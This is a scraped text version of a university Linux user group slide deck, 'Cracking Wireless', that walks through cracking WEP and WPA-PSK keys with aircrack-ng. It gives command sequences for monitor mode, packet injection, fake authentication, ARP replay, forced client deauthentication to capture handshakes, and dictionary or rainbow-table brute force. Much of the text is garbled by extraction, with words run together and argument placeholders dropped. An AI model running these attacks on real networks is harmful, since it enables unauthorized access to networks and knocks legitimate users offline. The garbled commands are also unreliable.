Upload
jam-barett
View
255
Download
0
Embed Size (px)
Citation preview
8/12/2019 How to Crack WPA
1/13
Ryan Curtin Cracking Wireless - p. 1
Cracking Wireless
Ryan Curtin
LUG@GT
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
2/13
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 2
Goals
By the end of this presentation (if you stay awake), you will:
Understand the different types of wireless keys as well as
their advantages and disadvantages
Understand the legal ramifications of cracking wireless keys
Have a basic idea of the theory behind the cracking of eachkey type
Know how to use software to crack wireless keys
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
3/13
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 3
Setting Up
Most of the work can be done with the aircrack-ngpackage.
None of these attacks can be performed if you are using
ndiswrapper for your network drivers, or other drivers that donot support promiscuous (or monitor) mode.
Starting / stopping promiscuous mode:
airmon-ng stop wlan0airmon-ng check wlan0
airmon-ng start wlan0
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
4/13
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 4
Checking Injection
Before starting, make sure your card can inject packets into anAP!
aireplay-ng -9 -e -a wlan0
Make sure the percentage of ping replies is not incrediblysmall, otherwise it may be difficult to collect data.
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
5/13
Goals
Setting Up
Checking Injection
WEP WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 5
WEP Encryption
The slide title isnotredundant! WEP stands for wiredequivalent privacy, not wireless encryption protocol.
64-bit or 128-bit keys
Uses RC4 stream cipher with CRC-32 checksum
Keys have 24-bit IV (initialization vector)
224(16 million) possible IVs
50% probability of repeated IV after only 5000 packets
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
6/13
Goals
Setting Up
Checking Injection
WEP WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 6
Cracking WEP
Different methods have been developed:
2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a
passive attack
2005: FBI demonstrates WEP cracking in three minutes
2006: Bittau, Handley, and Lackey show that active attacksare possible
2007: Pychine, Tews, and Weinmann optimize active attack(PTW attack)
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
7/13
Goals
Setting Up
Checking Injection
WEP
WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 7
Using aircrack-ng
1. Gather important data: access point MAC, ESSID, channelairodump-ng wlan0
2. Start capture of IVsairodump-ng -c -bssid -w
wlan0
Leave this running! You want to capture around 50k IVs
to ensure success (maybe more)
3. Fake authentication with APaireplay-ng -1 0 -e -a
wlan0
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
8/13
Goals
Setting Up
Checking Injection
WEP
WEP Encryption
Cracking WEP
Using aircrack-ng
Using aircrack-ng (2)
WPA
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 8
Using aircrack-ng (2)
4 Reinject ARP packets to get more IVsaireplay-ng -3 -b wlan0
Run until you have a substantial number of IVs (in yourairodump-ng process)
5 Crack the key!
FMS attacks (slow): aircrack-ng -f 1 -F.capPTW attacks (fast!): aircrack-ng -P 2
.cap
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
9/13
Goals
Setting Up
Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK
Using aircrack-ng
Rainbow Tables
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 9
WPA Encryption
WPA with TKIP appeared as an interim solution to the WEPproblem while 802.11i was prepared; 802.11i is WPA2.
WPA: Wi-Fi Protected Access TKIP: Temporal Key Integrity Protocol
TKIP also uses RC4 cipher (for legacy WEP hardware)
Use AES instead if possible!
IV length increased to 48 bits
WPA-PSK (pre-shared key): common consumer
environment setup
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
10/13
Goals
Setting Up
Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK
Using aircrack-ng
Rainbow Tables
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 10
Cracking WPA-PSK
The WPA PSK initialization process is reproducible!
Therefore, we must capture a WPA handshake and then try toreplicate it.
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
11/13
Goals
Setting Up
Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK
Using aircrack-ng
Rainbow Tables
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 11
Using aircrack-ng
1. Gather important data: access point MAC, ESSID, channel;optional: ESSID of connected client
airodump-ng wlan0
2. Start capture of handshakesairodump-ng -c -bssid -w
wlan0
Leave this running! Watch for WPA handshake:xx:xx:xx:xx:xx:xx
3. (Optional) Fake deauthentication of client to trigger
handshakeaireplay-ng -0 1 -a -c wlan0
Watch for successful ACK in program output
4. Brute-force attack saved handshakeaircrack-ng -w -b
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
12/13
Goals
Setting Up
Checking Injection
WEP
WPA
WPA Encryption
Cracking WPA-PSK
Using aircrack-ng
Rainbow Tables
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 12
Rainbow Tables
Rainbow Tables: a giant collection of potential commonpassphrases
Available from:
Church of Wifi Rainbow Tables:http://www.renderlab.net/projects/WPA-tables/
The Schmoo Group: http://rainbowtables.shmoo.com/
Google Search:http://www.google.com/#q=wpa+rainbow+tables
http://www.igglybob.com/http://www.igglybob.com/8/12/2019 How to Crack WPA
13/13
Goals
Setting Up
Checking Injection
WEP
WPA
Questions and Comments?
Questions and Comments?
Ryan Curtin Cracking Wireless - p. 13
Questions and Comments?
http://www.igglybob.com/http://www.igglybob.com/